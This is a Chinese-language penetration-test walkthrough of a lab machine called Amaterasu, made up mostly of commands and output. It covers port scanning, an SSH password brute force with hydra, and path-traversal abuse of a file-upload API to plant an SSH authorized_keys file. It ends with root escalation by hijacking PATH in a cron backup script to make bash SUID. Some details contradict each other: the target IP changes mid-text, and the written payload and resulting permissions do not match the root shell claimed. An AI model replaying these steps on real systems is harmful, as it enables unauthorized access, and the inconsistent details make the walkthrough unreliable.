利用ip a 获取攻击机IP > 192.168.45.168
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# sudo nmap --min-rate 10000 -p- 192.168.244.249
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-22 00:08 CST
Nmap scan report for 192.168.244.249
Host is up (0.26s latency).
Not shown: 65524 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
22/tcp closed ssh
111/tcp closed rpcbind
139/tcp closed netbios-ssn
443/tcp closed https
445/tcp closed microsoft-ds
2049/tcp closed nfs
10000/tcp closed snet-sensor-mgmt
25022/tcp open unknown
33414/tcp open unknown
40080/tcp open unknown
[!通过各两次扫描收集到端口 ]
21,22,111,139,443,445,2049,10000,25022,33414,40080
# tcp探测
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# sudo nmap -sT -sV -O -sC -p21,22,111,139,443,445,2049,10000,25022,33414,40080 192.168.244.249
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-22 00:12 CST
Nmap scan report for 192.168.244.249 Host is up (0.26s latency). PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Can't get directory listing: TIMEOUT | ftp-syst: | STAT: | FTP server status: | Connected to 192.168.45.168 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text
22/tcp closed ssh
111/tcp closed rpcbind
139/tcp closed netbios-ssn
443/tcp closed https
445/tcp closed microsoft-ds
2049/tcp closed nfs
10000/tcp closed snet-sensor-mgmt
25022/tcp open ssh OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey:
| 256 68:c6:05:e8:dc:f2:9a:2a:78:9b:ee:a1:ae:f6:38:1a (ECDSA)
|_ 256 e9:89:cc:c2:17:14:f3:bc:62:21:06:4a:5e:71:80:ce (ED25519)
33414/tcp open unknown
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 404 NOT FOUND
| Server: Werkzeug/2.2.3 Python/3.9.13
| Date: Fri, 21 Jul 2023 16:12:42 GMT
| Content-Type: text/html; charset=utf-8
| Content-Length: 207
| Connection: close
|
|
| 404 Not Found
40080/tcp open http Apache httpd 2.4.53 ((Fedora))
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.53 (Fedora)
|_http-title: My test page
总体来看的话,开放了4个端口
21-ftp、25022-ssh、33414-tcp、40080-http
通过Nmap
探测获得FTP的版本信息,可以大致推测FTP的配置文件位置
# 如果探测版本为vsftpd 3.0.3
cat /etc/vsftpd.conf
尝试匿名账号anonymous
以及无密码进行登录测试
# 利用ftp协议+ip进行连接测试
ftp 192.168.244.249
Name: anonymous
登录FTP之后利用ls
查看存在哪些目录,翻阅的同时查看一下文件权限
利用GET
下载文件
# binary 以二进制模式传输文件,保证文件完整
ftp > binary
# 查看目录结构
ftp > ls -al
目标 ssh 192.168.244.249:25022
尝试root
账户的密码爆破,利用工具hydra
,线程-t为4
hydra -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.242.249 ssh -t4 -s 25022
放着持续爆破,我们进行下一项内容
尝试root
账户的密码爆破发现报错之后进行手动尝试
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# ssh [email protected] -p 25022
[email protected]'s password:
Permission denied, please try again.
http://192.168.242.249:33414
根据nmap探测信息33414是一个tcp协议,可以http访问
这时候简单的进行了chatgpt问答确定Werkzeug
是什么,决定使用目录扫描
Werkzeug是一个Python的WSGI工具库,用于构建Web应用程序和框架。Werkzeug提供了一套灵活的工具,用于处理HTTP请求和响应、路由请求、处理会话、进行调试等等。
dirsearch -u http://192.168.242.249:33414 -x 302,403
先看一下help
和info
接口有无信息吧,没有的话可以考虑挂着深度扫描
0 "GET /info : General Info"
1 "GET /help : This listing"
2 "GET /file-list?dir=/tmp : List of the files"
3 "POST /file-upload : Upload files"
访问 http://192.168.242.249:40080 是火狐的一个界面。首先探索一下33414
可以确认是一个上传功能点
curl http://192.168.242.249:33414/file-upload
# GET模式不允许的我们改成POST
curl -X POST http://192.168.242.249:33414/file-upload
问了一下chatgpt
得到的结论是需要-F "file=@/path/to/file"
# 创建一个文件
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# touch test.abcd
# 上传
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# curl -X POST -F file="@/home/bachang/Amaterasu/test.abcd" http://192.168.242.249:33414/file-upload
{"message":"No filename part in the request"}
# No filename part 需要文件名
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# curl -X POST -F file="@/home/bachang/Amaterasu/test.abcd" -F filename=a http://192.168.242.249:33414/file-upload
{"message":"Allowed file types are txt, pdf, png, jpg, jpeg, gif"}
根据需求尝试进行修改
# 上传的文件名必须符合白名单
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# curl -X POST -F file="@/home/bachang/Amaterasu/test.txt" -F filename=a.txt http://192.168.242.249:33414/file-upload
{"message":"File successfully uploaded"}
查看了一下文件上传的位置,发现是在/tmp
目录下
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# curl http://192.168.242.249:33414/file-list?dir=/tmp
["a.txt",....]
如果存在上传以及读取有哪些利用方式呢?
上传可以覆盖一些文件让我们登录,确认是否可以上传目录穿越
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# curl -X POST -F file="@/home/bachang/Amaterasu/test.txt" -F filename=../a.txt http://192.168.242.249:33414/file-upload
500 Internal Server Error
Internal Server Error
The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.
错误是无法完成请求,说明尝试写入到根目录中,没有权限
利用路径读取寻找有用的写入点,除了tmp之外应该还有用户权限的地方可以写入
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# curl http://192.168.242.249:33414/file-list?dir=/home
["alfredo"]
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# curl http://192.168.242.249:33414/file-list?dir=/home/alfredo
[".bash_logout",".bash_profile",".bashrc","local.txt",".ssh","restapi",".bash_history"]
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# curl http://192.168.242.249:33414/file-list?dir=/home/alfredo/.ssh
["id_rsa","id_rsa.pub"]
发现存在alfredo
的用户,存在.ssh
的文件夹,可以尝试该文件夹是否可以上传
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# curl -X POST -F file="@/home/bachang/Amaterasu/test.txt" -F filename=/home/alfredo/.ssh/a.txt http://192.168.242.249:33414/file-upload
{"message":"File successfully uploaded"}
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# curl http://192.168.242.249:33414/file-list?dir=/home/alfredo/.ssh
["id_rsa","id_rsa.pub","a.txt"]
考虑上传攻击机的authorized_keys
到alfredo
的用户,进行密钥ssh登录
首先在攻击机上生成对应的密钥对
ssh-keygen -t rsa
...
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# ls
text.txt text.txt.pub
接着在文件上传点尝试上传id_rsa_test.pub
利用目录穿越的方式将其上传到/home/alfredo/.ssh/authorized_keys
# 先修改白名单后缀
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# mv text.txt.pub text.txt.txt
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# ls
hydra.restore text.txt text.txt.txt
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# curl -X POST -F file="@/home/bachang/Amaterasu/text.txt.txt" -F filename=/home/alfredo/.ssh/authorized_keys http://192.168.242.249:33414/file-upload
{"message":"File successfully uploaded"}
获取密钥之后指定密钥进行登录
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# ssh -i text.txt [email protected] -p25022
Last login: Tue Mar 28 03:21:25 2023
[alfredo@fedora ~]$
[alfredo@fedora ~]$ find / -name local.txt 2>/dev/null
/home/alfredo/local.txt
[alfredo@fedora ~]$ cat /home/alfredo/local.txt
*****************************************
查找具有sudo
权限,且不需要密码的可提权文件
# 利用sudo -l寻找
sudo -l
# -perm 文件权限
[alfredo@fedora ~]$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/fusermount
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/crontab
/usr/bin/fusermount3
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/at
/usr/bin/staprun
/usr/sbin/grub2-set-bootflag
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/mount.nfs
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/libexec/cockpit-session
没找到什么比较好的提权内容
# 探查有CAP_SETUID标志的进程
[alfredo@fedora ~]$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/newgidmap cap_setgid=ep
/usr/bin/newuidmap cap_setuid=ep
/usr/bin/arping cap_net_raw=p
/usr/bin/clockdiff cap_net_raw=p
/usr/sbin/suexec cap_setgid,cap_setuid=ep
/usr/sbin/mtr-packet cap_net_raw=ep
# 寻找定时任务并修改进行提权
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
*/1 * * * * root /usr/local/bin/backup-flask.sh
发现每过一分钟会以执行一次backup-flask.sh
# 确定我们是否可以改
[alfredo@fedora ~]$ ls -al cat /usr/local/bin/backup-flask.sh
ls: cannot access 'cat': No such file or directory
-rwxr-xr-x. 1 root root 106 Mar 28 03:18 /usr/local/bin/backup-flask.sh
# 查看内容
[alfredo@fedora ~]$ cat /usr/local/bin/backup-flask.sh
#!/bin/sh
export PATH="/home/alfredo/restapi:$PATH"
cd /home/alfredo/restapi
tar czf /tmp/flask.tar.gz *
backup-flask.sh
会将用户下设置成环境变量并且执行一次tar
因为我们用户环境可控,所以我们自己做一个tar的命令进行任务计划帮助提权
# 查看bash权限
[alfredo@fedora restapi]$ ls -al /bin/bash
-rwxr-xr-x. 1 root root 1390080 Jan 25 2021 /bin/bash
# 写一个提bash权命令 增加suid
[alfredo@fedora restapi]$ echo "chmod +u+s /bin/bash" > tar
[alfredo@fedora restapi]$ cat tar
chmod 777 /bin/bash
# 增加执行权限
[alfredo@fedora restapi]$ chmod +x tar
[alfredo@fedora restapi]$ cat tar
chmod 777 /bin/bash
[alfredo@fedora restapi]$ ls -al /bin/bash
-rwxrwxrwx. 1 root root 1390080 Jan 25 2021
# 成功提升权限
[alfredo@fedora restapi]$ ls -al /bin/bash
-rwxrwxrwx. 1 root root 1390080 Jan 25 2021 /bin/bash
# bash -p 获得权限
[alfredo@fedora restapi]$ bash -p
bash-5.1# whoami
root
bash-5.1# cat /root/proof.txt
**********************************